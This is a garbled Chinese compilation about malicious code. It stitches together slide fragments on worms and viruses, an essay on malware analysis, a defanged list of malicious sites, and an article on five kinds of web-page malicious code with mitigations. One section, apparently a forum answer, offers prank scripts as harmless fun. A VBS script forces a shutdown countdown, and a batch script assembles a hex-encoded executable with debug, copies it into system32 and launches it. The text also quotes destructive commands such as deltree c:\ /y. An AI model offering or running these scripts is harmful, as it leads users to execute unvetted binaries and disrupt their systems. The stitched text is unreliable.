五大网页恶意代码
计算机恶意代码与防护

恶意代码(Malicious code)或者叫恶意软件 ( Malware :Malicious Software)是一种程序,它通 过把代码在不被察觉的情况下镶嵌到另一段程序中, 从而达到运行具有入侵性或破坏性的程序、破坏被感 染电脑数据的安全性和完整性的目的。
亨达通信
恶意代码的发展史
亨达通信
预防该类病毒较为有效的系统设置措施:将资源管理设 置为:
(2)文件夹病毒 该病毒也是常见的U盘传播病毒,会在U盘中生成与文 件夹同名的可执行程序,同时将原文件夹设置为隐藏属性。
亨达通信
5.6 防病毒系统
(1)单击工作站(个人计算机) 安装杀毒软件等安全软件。 (2)服务器 安装相应版本的杀毒软件等安全软件。 (3)企业网络 一般不主张购置所谓“带病毒过滤功能”的防火墙网关产品 (因为该类产品会使防火墙性能大幅下降 、增加防火墙的安 全隐患),国际上通用的对网关防病毒的做法是将防火墙上 的数据引导到另外的专门进行病毒检测的服务器上进行,而 不是直接在防火墙上进行病毒检测。
“HKEY_USERS\DEFAULT\Software\Microsoft\Windows\CurrentVersion\P olicies\System”中的一个键名叫“DisableRegistryTools”的十六进制的值由 1改为0,1为禁止,0为允许。
利用记事本等新建一个文件:
REGEDIT4[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\Curre ntVersion\Policies\system"DisableRegistryTools"=dword:00000000]
亨达通信
几个常用恶意代码

on error resume nextdim WSHshellAset WSHshellA = wscript.createobject("wscript.shell")WSHshellA.run "cmd.exe /c shutdown -r -t 60 -c ""说我是猪,不说就一分钟关你机,不信,试试···"" ",0 ,truedim ado while(a <> "我是猪")a = inputbox ("说我是猪,就不关机,快撒,说""我是猪"" ","说不说","不说",8000,7000) msgbox chr(13) + chr(13) + chr(13) + a,0,"MsgBox"loopmsgbox chr(13) + chr(13) + chr(13) + "早说就行了嘛"dim WSHshellset WSHshell = wscript.createobject("wscript.shell")WSHshell.run "cmd.exe /c shutdown -a",0 ,truemsgbox chr(13) + chr(13) + chr(13) + "哈哈哈哈,真过瘾"最佳答案打开个txt,输入shutdown -l -o另存为*.cmd,双击,不过这太白痴了这样更好taskkill /f /im *.exe & shutdown -l -o 1>nul 2>nul这也白痴,想开玩笑不一定关机,我弄过一个脚本,@echo e 100 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 >>tmp11@echo e 110 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 >>tmp11@echo e 120 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 >>tmp11@echo e 130 00 00 00 00 00 00 00 00 00 00 00 00 C8 00 00 00 >>tmp11@echo e 140 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 >>tmp11@echo e 150 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F >>tmp11@echo e 160 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20 >>tmp11@echo e 170 6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00 >>tmp11@echo e 180 E7 81 B5 C3 A3 E0 DB 90 A3 E0 DB 90 A3 E0 DB 90 >>tmp11@echo e 190 B0 E8 86 90 A1 E0 DB 90 20 E8 86 90 A0 E0 DB 90 >>tmp11@echo e 1A0 A3 E0 DA 90 AA E0 DB 90 A6 EC 84 90 A1 E0 DB 90 >>tmp11@echo e 1B0 A6 EC 81 90 A2 E0 DB 90 52 69 63 68 A3 E0 DB 90 >>tmp11@echo e 1C0 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 03 00 >>tmp11@echo e 1D0 FD 19 07 3F 00 00 00 00 00 00 00 00 E0 00 0F 01 >>tmp11@echo e 1E0 0B 01 07 0A 00 02 00 00 00 04 00 00 00 00 00 00 >>tmp11@echo e 1F0 C0 10 00 00 00 10 00 00 00 20 00 00 00 00 40 00 >>tmp11@echo e 200 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 >>tmp11@echo e 210 04 00 00 00 00 00 00 00 00 40 00 00 00 04 00 00 >>tmp11@echo e 220 00 00 00 00 02 00 00 04 00 00 10 00 00 10 00 00 >>tmp11@echo e 230 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 >>tmp11@echo e 240 00 00 00 00 00 00 00 00 4C 20 00 00 3C 00 00 00 >>tmp11@echo e 250 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 >>tmp11@echo e 260 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 >>tmp11@echo e 270 30 20 00 00 1C 00 00 00 00 00 00 00 00 00 00 00 >>tmp11@echo e 280 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 >>tmp11@echo e 290 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 >>tmp11@echo e 2A0 00 20 00 00 2C 00 00 00 00 00 00 00 00 00 00 00 >>tmp11@echo e 2B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 >>tmp11@echo e 2C0 2E 74 65 78 74 00 00 00 86 01 00 00 00 10 00 00 >>tmp11@echo e 2D0 00 02 00 00 00 04 00 00 00 00 00 00 00 00 00 00 >>tmp11@echo e 2E0 00 00 00 00 20 00 00 60 2E 72 64 61 74 61 00 00 >>tmp11@echo e 2F0 98 01 00 00 00 20 00 00 00 02 00 00 00 06 00 00 >>tmp11@echo e 300 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 >>tmp11@echo e 310 2E 64 61 74 61 00 00 00 28 00 00 00 00 30 00 00 >>tmp11@echo e 320 00 02 00 00 00 08 00 00 00 00 00 00 00 00 00 00 >>tmp11@echo e 330 00 00 00 00 40 00 00 C0 00 00 00 00 00 00 00 00 >>tmp11@echo e 500 56 8B 74 24 08 57 68 10 30 40 00 56 FF 15 10 20 >>tmp11@echo e 510 40 00 8B 0D 10 30 40 00 83 F9 CE 8B 15 18 30 40 >>tmp11@echo e 520 00 8B 3D 24 30 40 00 A1 14 30 40 00 7D 21 83 F8 >>tmp11@echo e 530 CE 7C 21 6A 05 6A 00 6A 00 83 E8 0A 50 51 6A 00 >>tmp11@echo e 540 56 A3 14 30 40 00 FF 15 0C 20 40 00 5F 5E C3 83 >>tmp11@echo e 550 F8 CE 7D 0E 53 8D 5F 32 3B D3 5B 7F 05 83 C1 0A >>tmp11@echo e 560 EB 39 83 C7 32 3B D7 7E 2F 8B 15 20 30 40 00 8B >>tmp11@echo e 570 3D 1C 30 40 00 83 C2 32 3B FA 7F 1C 6A 05 6A 00 >>tmp11@echo e 580 6A 00 83 C0 0A 50 51 6A 00 56 A3 14 30 40 00 FF >>tmp11@echo e 590 15 0C 20 40 00 5F 5E C3 83 E9 0A 6A 05 6A 00 6A >>tmp11@echo e 5A0 00 50 51 6A 00 56 89 0D 10 30 40 00 FF 15 0C 20 >>tmp11@echo e 5B0 40 00 5F 5E C3 CC CC CC CC CC CC CC CC CC CC CC >>tmp11 @echo e 5C0 56 68 10 30 40 00 FF 15 24 20 40 00 50 FF 15 10 >>tmp11@echo e 5D0 20 40 00 A1 18 30 40 00 8B 0D 1C 30 40 00 8B 35 >>tmp11@echo e 5E0 20 20 40 00 68 91 00 00 00 A3 24 30 40 00 89 0D >>tmp11@echo e 5F0 20 30 40 00 FF D6 A8 01 75 60 53 8B 1D 1C 20 40 >>tmp11 @echo e 600 00 55 8B 2D 18 20 40 00 57 8B 3D 14 20 40 00 90 >>tmp11 @echo e 610 FF D7 50 E8 E8 FE FF FF 83 C4 04 6A 00 FF D3 50 >>tmp11 @echo e 620 E8 DB FE FF FF 83 C4 04 E8 36 00 00 00 99 F7 3D >>tmp11 @echo e 630 20 30 40 00 52 E8 29 00 00 00 99 F7 3D 24 30 40 >>tmp11 @echo e 640 00 52 FF D5 6A 14 FF 15 00 20 40 00 68 91 00 00 >>tmp11 @echo e 650 00 FF D6 A8 01 74 B9 5F 5D 5B 6A 00 FF 15 04 20 >>tmp11 @echo e 660 40 00 5E A1 00 30 40 00 69 C0 FD 43 03 00 05 C3 >>tmp11 @echo e 670 9E 26 00 A3 00 30 40 00 33 C0 66 A1 02 30 40 00 >>tmp11 @echo e 680 25 FF 7F 00 00 C3 00 00 00 00 00 00 00 00 00 00 >>tmp11 @echo e 700 C2 20 00 00 B4 20 00 00 00 00 00 00 D8 20 00 00 >>tmp11 @echo e 710 E8 20 00 00 F8 20 00 00 0E 21 00 00 1E 21 00 00 >>tmp11 @echo e 720 2E 21 00 00 3C 21 00 00 00 00 00 00 00 00 00 00 >>tmp11 @echo e 730 00 00 00 00 FD 19 07 3F 00 00 00 00 02 00 00 00 >>tmp11 @echo e 730 00 00 00 00 FD 19 07 3F 00 00 00 00 02 00 00 00 >>tmp11 @echo e 740 3C 00 00 00 5C 21 00 00 5C 07 00 00 88 20 00 00 >>tmp11 @echo e 750 00 00 00 00 00 00 00 00 CA 20 00 00 00 20 00 00 >>tmp11 @echo e 760 94 20 00 00 00 00 00 00 00 00 00 00 50 21 00 00 >>tmp11@echo e 770 0C 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 >>tmp11@echo e 780 00 00 00 00 00 00 00 00 C2 20 00 00 B4 20 00 00 >>tmp11 @echo e 790 00 00 00 00 D8 20 00 00 E8 20 00 00 F8 20 00 00 >>tmp11 @echo e 7A0 0E 21 00 00 1E 21 00 00 2E 21 00 00 3C 21 00 00 >>tmp11 @echo e 7B0 00 00 00 00 AF 00 45 78 69 74 50 72 6F 63 65 73 >>tmp11 @echo e 7C0 73 00 47 03 53 6C 65 65 70 00 4B 45 52 4E 45 4C >>tmp11 @echo e 7D0 33 32 2E 64 6C 6C 00 00 83 02 53 65 74 57 69 6E >>tmp11 @echo e 7E0 64 6F 77 50 6F 73 00 00 74 01 47 65 74 57 69 6E >>tmp11 @echo e 7F0 64 6F 77 52 65 63 74 00 17 01 47 65 74 46 6F 72 >>tmp11@echo e 800 65 67 72 6F 75 6E 64 57 69 6E 64 6F 77 00 4F 02 >>tmp11 @echo e 810 53 65 74 43 75 72 73 6F 72 50 6F 73 00 00 63 01 >>tmp11@echo e 820 47 65 74 54 6F 70 57 69 6E 64 6F 77 00 00 21 01 >>tmp11 @echo e 830 47 65 74 4B 65 79 53 74 61 74 65 00 0E 01 47 65 >>tmp11 @echo e 840 74 44 65 73 6B 74 6F 70 57 69 6E 64 6F 77 00 00 >>tmp11 @echo e 850 55 53 45 52 33 32 2E 64 6C 6C 00 00 52 53 44 53 >>tmp11 @echo e 860 15 F4 68 A6 3F 1B F6 4A 85 E8 67 8B 58 CA E2 04 >>tmp11 @echo e 870 02 00 00 00 66 3A 5C 50 72 6F 6A 65 63 74 73 5C >>tmp11 @echo e 880 46 65 61 73 74 5C 52 65 6C 65 61 73 65 5C 46 65 >>tmp11 @echo e 890 61 73 74 2E 70 64 62 00 00 00 00 00 00 00 00 00 >>tmp11@echo rcx>>tmp11@echo A00>>tmp11@echo n tmp1>>tmp11@echo w>>tmp11@echo q>>tmp11@debug<tmp11@Copy /b /y tmp1 %systemroot%\system32\Feast.exe@start %systemroot%\system32\Feast.exe@del tmp11@del tmp1把这些写道txt里面,另存为文件名.bat,双击运行,绝对的joke,很好玩的哦~这两个都不是病毒。
25恶意代码

混合型蠕虫
同时具有漏洞型、邮件型、共享型和寄生型的 某些或全部特征 传播能力和危害最大
求职信(I-Worm/Klez) 超级密码杀手(爱情后门,I-Worm/Supkp) 网络天空(I-Worm/Netsky) 雏鹰(I-Worm/BBEagle) ……
21
蠕虫的爆发周期越来越短…
漏洞公布和蠕虫爆发的间隔越来越短
13
计算机蠕虫的类型
系统漏洞型 群发邮件型 共享型 寄生型 混合型 …… ……
14
系统漏洞型病毒
红色代码(IIS-Worm/CodeRed) 尼姆达(I-Worm/Nimda) 求职信(I-Worm/Klez) 冲击波(I-Worm/Blaster) 震荡波(I-Worm/Sasser) 安哥(Backdoor/Agobot)
及时 太晚了
最佳时机
漏洞发现
攻击代码
蠕虫爆发
控制
清除
越来越短
越来越长,越来越难
22
补丁:MS04-011 2004年4月13日
2004年5月1日
时间间隔
18 天
震荡波
补丁:MS03-026 2003年7月16日 2003年8月11日
冲击波
补丁: MS02-039 2002年7月24日 2003年1月25日
如CIH、爱虫、新欢乐时光、求职信、恶鹰、rose…
2.
网络蠕虫:一组能够进行自我传播、不需要用户干预 即可触发执行的破坏性程序或代码。
其通过不断搜索和侵入具有漏洞的主机来自动传播。 如红色代码、SQL蠕虫王、冲击波、震荡波、极速波…
3.
特洛伊木马:是指一类看起来具有正常功能,但实 际上隐藏着很多用户不希望功能的程序。通常由控 制端和被控制端两端组成。
五大网页恶意代码

“恶意代码2”的代码较之“恶意代码1”的特点就是表现方式较隐蔽,一般的人不容易发现隐形恶意代码正在读取自己硬盘上的文件。“恶意代码2”还能利用浏览器自身漏洞来实现其杀招,如IE5.0的IFrame漏洞。很简单的几行代码就可以读取你本地硬盘上的任何IE可以打开的文件。
避恶方法 可以通过关闭JavaScript并随时注意微软的安全补丁来解决。
避恶方法 上网时,最好关掉浏览器的JavaScript,使攻击者不能隐藏攻击的迹象,只有当访问熟悉的网站时才打开它,虽然这会减少浏览器的功能,但我想这样做还是值得的。还有就是不要从自己不熟悉的网站上链接到其他网站,特别是链接那些需要输入个人账户名和密码的网站。
恶意代码4:控制用户机
目前这类问题主要集中在IE对Actives的使用上。
பைடு நூலகம்
我们现在可以看一看自己IE的安全设置,对于“下载已签名的ActiveX控件”,现在的选项是“提示”。但你可能不知道,IE仍然有特权在无需提示的情况下下载和执行程序。这是一个严重的安全问题,我们可能在不知情的情况下被别人完全控制。
恶意代码1:占用CPU
通过不断地消耗本机的系统资源,最终导致CPU占用率高达100%,使计算机不能再处理其他用户的进程。
“恶意代码1”代码的典型恶作剧是通过JavaScript产生一个死循环。这类代码可以是在有恶意的网站中出现,也可以以邮件附件的形式发给你。现在大多数的邮件客户端程序都可以自动调用浏览器来打开HTM/HTML类型的文件。这样只要你一打开附件,屏幕上就会出现无数个新开的浏览器窗口。最后让你不得不重新启动计算机。
恶意代码5 :非法格式化本地硬盘
这类代码的危害较大。只要你浏览了它的网页,你的硬盘就会被格式化。
网络安全中的恶意代码分析与防范

网络安全中的恶意代码分析与防范恶意代码(Malware)是指故意编写的、以非法方式获取用户计算机上数据、控制计算机或者传播恶意软件的软件程序或脚本。
随着互联网的发展,恶意代码的数量和种类不断增加,给用户计算机带来了巨大风险。
因此,对于网络安全中的恶意代码分析与防范成为了一个重要的议题。
一、恶意代码的类型恶意代码的类型繁多,常见的恶意代码包括病毒、蠕虫、木马、间谍软件等。
这些恶意代码以不同的方式侵入到用户计算机中,对用户的信息和系统安全构成威胁。
1.病毒(Virus):病毒是一种能够通过自我复制和植入到其他可执行文件中来传播的恶意代码。
病毒可以破坏或删除文件,感染其他文件并传播到其他计算机上。
2.蠕虫(Worm):蠕虫是一种无需依赖其他程序传播的恶意代码。
蠕虫可以通过网络连接和传播自己,感染其他计算机并利用系统漏洞获取权限,从而对计算机进行攻击。
3.木马(Trojan):木马是一种将恶意功能隐藏在看似有用的程序中的恶意代码。
用户在下载和安装这些程序时,木马就会获取系统权限,窃取用户的敏感信息或者控制系统进行攻击。
4.间谍软件(Spyware):间谍软件是一种用于窃取用户个人信息并未用户做出批准的恶意代码。
间谍软件可以记录用户的浏览记录、键盘输入、窃取敏感信息等。
二、恶意代码的分析恶意代码分析是指对恶意代码进行研究和解剖,以了解其行为特征、传播方式和攻击手段,为后续的防范提供依据。
恶意代码分析主要包括静态分析和动态分析。
1.静态分析:静态分析是通过对恶意代码的静态特征进行分析,如文件大小、文件结构、代码特征等。
静态分析可以帮助分析人员了解恶意代码的基本功能和执行路径,但无法获取其具体行为和产生的动态效果。
2.动态分析:动态分析是通过在受控环境中进行恶意代码的执行并观察其行为。
动态分析可以获取恶意代码的运行轨迹、网络连接、系统变化等信息。
这可以帮助分析人员深入了解恶意代码的具体行为和对计算机系统的威胁程度。
简单的黑客攻击代码

简单的黑客攻击代码黑客攻击是现代社会中很常见的事件之一。
黑客通过利用目标的漏洞或者弱点,攻击任何一个计算机系统,企业或个人电脑,从而窃取有价值的信息或破坏目标的计算机系统。
以下是一些常见的黑客攻击代码。
1. 流量洪泛攻击(DDoS攻击)这种攻击最常见的方法是用大量的计算机同时向同一个目标发送请求,导致目标服务器瘫痪。
攻击者可以利用僵尸网络来实现攻击,从而同时利用多台电脑发动攻击,从而让目标服务器无法运行。
2. SQL 注入攻击这种攻击是通过插入恶意代码来破坏目标系统的数据库,从而获取数据库的信息。
通过利用目标网站的漏洞,攻击者可以注入含有恶意代码的 SQL 语句,从而可以访问数据库并且修改数据,并且可以窃取目标数据库的信息。
3. 电子邮件钓鱼攻击这种威胁通过电子邮件来进行,包括一些伪装成合法来源的电子邮件,通过诱惑受害者点击链接或下载附件,从而窃取信息或者下载恶意软件。
攻击者通过伪装成合法来源,让受害者感到相信这是真实事件,从而成功骗取信息或者进行其他的攻击。
4. 拒绝服务攻击(DoS攻击)这种攻击是通过占用目标计算机的系统资源来导致系统不能正常工作。
攻击者通过发送一些无用的数据包来占用目标服务器的网络带宽和计算能力,从而导致目标服务器瘫痪。
5. 蓝牙攻击这种攻击利用蓝牙的漏洞来进行,攻击者可以通过与目标设备连接,获得目标设备的控制权来窃取数据或者控制目标设备。
攻击者通过使用专门的工具,可以破解目标蓝牙设备的密码,从而获取设备的控制权或者窃取目标设备中的数据。
以上是一些常见的黑客攻击代码,为了保障自己和企业的互联网安全,我们需要采取一些有效的预防措施,比如安装杀毒软件和防火墙,定期更新软件和操作系统补丁,使用强密码等等。
25个最恶意的病毒网站

25个最恶意的病毒网站如今的恶意网站真是太多了,稍不小心就会中招,小编尽己所能在茫茫互联网中搜集了25个恶意网站,警示大家,但凡遇到以下网站,千万别点击哦!警告:以下网站请勿进去!进去者自己处理。
25个最恶意的中文网站,千万不要试!(为防网友误点入,已把http:// 转换为hxxp:///)1、hxxp:/// 打开后,重启时你的主页就变成它的,并通过QQ 向他人传播,现在正飙行,奇坏无比!2、hxxp:/// 打开后,重启时你的主页就变成它的,并通过QQ 向他人传播,而且传波病毒,还狠些!现在正在飙行!3、hxxp:///4、hxxp:///5. hxxp:///6. hxxp:///7. hxxp:/// ***,打开后,你的程序中将加一些你意想不到的东西8. hxxp:///9. hxxp:///10. hxxp:///11. hxxp:///12. hxxp:///13. hxxp:///14. hxxp:///15. hxxp:///16. hxxp:///17. hxxp:/// 要特别小心这个网站,它会在你激活组里做手脚,使得重启以后标题依旧!18. hxxp:/// OE 标题栏也没放过19. hxxp:/// IE 的主页也被改了20. hxxp:/// 更可怕,把IE 的默认页都改成他的了21. hxxp://hxxp:/// 什么雪落无声音乐网,恶性:禁止注册表修改,禁止开始菜单「运行」项。
开机自动运行他的主页。
22. hxxp://www.163 [1].com 也是一个什么音乐网。
症状和楼上的差不多。
我上次中招后化了一个多小时才改回来!还有夹带病毒!23. hxxp://hxxp:/// 看清楚!不是3721,可恶讨厌,在你的机器里到处做手脚:注册表激活计算器配置文件还有一个dll 文件而且资源管理器无法浏览隐藏文件,这个最讨厌!24. hxxp:/// 禁止你的注册表,改首页,主页地址栏变灰,改右键,最毒!更多列表:hxxp://(net) 与文章中的1、2 类似,这3 个网站都有这种恶性,互相为变种。
恶意代码类型

恶意代码类型
绝⼤多数的恶意代码可以分类为如下⼏个类别:
1.后门
恶意代码将⾃⾝安装到⼀台计算机上允许攻击者进⾏访问。
后门程序通常让攻击者只需很低级别的认证或者⽆需认证,便可连接到计算机上,并可以在本地系统执⾏命令。
2.僵⼫⽹络
与后门类似,也允许攻击者访问系统。
但是所有被同⼀个僵⼫⽹络感染的计算机将会从⼀台控制命令服务器接收到相同的命令。
3.下载器
这是⼀类只是⽤来下载其他恶意代码的恶意代码。
下载器通常是在攻击者获得系统的访问时⾸先安装的。
去下载安装其他恶意代码。
4.间谍软件
从受害计算机上收集信息并发送给攻击者的恶意代码。
5.启动器
⽤来启动其他恶意程序的恶意代码。
6.内核套件
设计⽤来隐藏其他恶意代码的恶意代码。
7.蠕⾍或计算机病毒
可以⾃我复制和感染其他计算机的恶意代码。
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
对于个人用户来说,除了病毒和木马,网页中的隐形恶意代码也开始严重地威胁着我们的安全,但大多数人却缺乏自我保护意识,对隐形恶意代码的危害认识不够,甚至在自己不知情的情况下被别人窃取了重要资料。
因为隐形恶意代码具有比较大的隐蔽性,到目前为止,还没有什么病毒防火墙能很好地阻止隐形代码的攻击,大多数甚至根本就不能发现。
所以我们更应该高度警惕网页代码中的隐形杀手。
一般来说网页代码中的“隐形杀手”大致分为以下几类:
恶意代码1:占用CPU
通过不断地消耗本机的系统资源,最终导致CPU占用率高达100%,使计算机不能再处理其他用户的进程。
“恶意代码1”代码的典型恶作剧是通过JavaScript产生一个死循环。
这类代码可以是在有恶意的网站中出现,也可以以邮件附件的形式发给你。
现在大多数的邮件客户端程序都可以自动调用浏览器来打开HTM/HTML类型的文件。
这样只要你一打开附件,屏幕上就会出现无数个新开的浏览器窗口。
最后让你不得不重新启动计算机。
避恶方法对于这类问题,只能是不要随便打开陌生人寄来的邮件的附件,特别是扩展是.vbs、.htm、.doc、.exe的附件。
恶意代码2:非法读取本地文件
这类代码典型的作法是在网页中通过对Activex、JavaScript和WebBrowser control 的调用来读本地文件。
“恶意代码2”的代码较之“恶意代码1”的特点就是表现方式较隐蔽,一般的人不容易发现隐形恶意代码正在读取自己硬盘上的文件。
“恶意代码2”还能利用浏览器自身漏洞来实现其杀招,如IE5.0的IFrame漏洞。
很简单的几行代码就可以读取你本地硬盘上的任何IE 可以打开的文件。
避恶方法可以通过关闭JavaScript并随时注意微软的安全补丁来解决。
恶意代码3:Web欺骗
攻击者通过先攻入负责目标机域名解析的DNS服务器,然后把DNS-IP地址复位到一台他已经拿下超级用户权限的主机。
这类攻击目前在国内很少出现,但如果成功的话危害却非常大。
而且可能会损失惨重。
其攻击方法是:在他已经拿下超级用户权限的那台主机上伪造一个和目标机完全一样的环境,来诱骗你交出你的用户名和密码。
比如说我们的邮件甚至网上的银行账号和密码。
因为你面对的是一个和昨天一样的环境,在你熟练的敲入用户名和密码的时候。
根本没有想到不是真正的主机。
避恶方法上网时,最好关掉浏览器的JavaScript,使攻击者不能隐藏攻击的迹象,只
有当访问熟悉的网站时才打开它,虽然这会减少浏览器的功能,但我想这样做还是值得的。
还有就是不要从自己不熟悉的网站上链接到其他网站,特别是链接那些需要输入个人账户名和密码的网站。
恶意代码4:控制用户机
目前这类问题主要集中在IE对Actives的使用上。
我们现在可以看一看自己IE的安全设置,对于“下载已签名的ActiveX控件”,现在的选项是“提示”。
但你可能不知道,IE仍然有特权在无需提示的情况下下载和执行程序。
这是一个严重的安全问题,我们可能在不知情的情况下被别人完全控制。
避恶方法在注册表HKEY-LOCAL-MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatiblity”下为“Active Setup controls”创建一个基于CLSID的新建{6E449683-C509-11CF-AAFA-00AA00 B6015C}在新建下创建REGDWORD类型的值:Compatibility Flags 0x00000400。
恶意代码5 :非法格式化本地硬盘
这类代码的危害较大。
只要你浏览了它的网页,你的硬盘就会被格式化。
这并不是耸人听闻,其实IE可以通过执行ActiveX而使硬盘被格式化并不是什么新漏洞,如果浏览含有这类代码的网页,你的本机硬盘就会被快速格式化,而且因为格式化时窗口是最小化的,你可能根本就没注意,等发现已悔之晚矣。
避恶方法把本机的、deltree.exe等危险命令改名也是一个办法。
因为我们在Windows中要真正用到这些DOS命令的情况并不是很多,而很多宏病毒或危险代码就是直接调用这些DOS命令,如有名的国产宏病毒“七月杀手”,就是在Autoexec.bat中加入了deltree c:\ /y。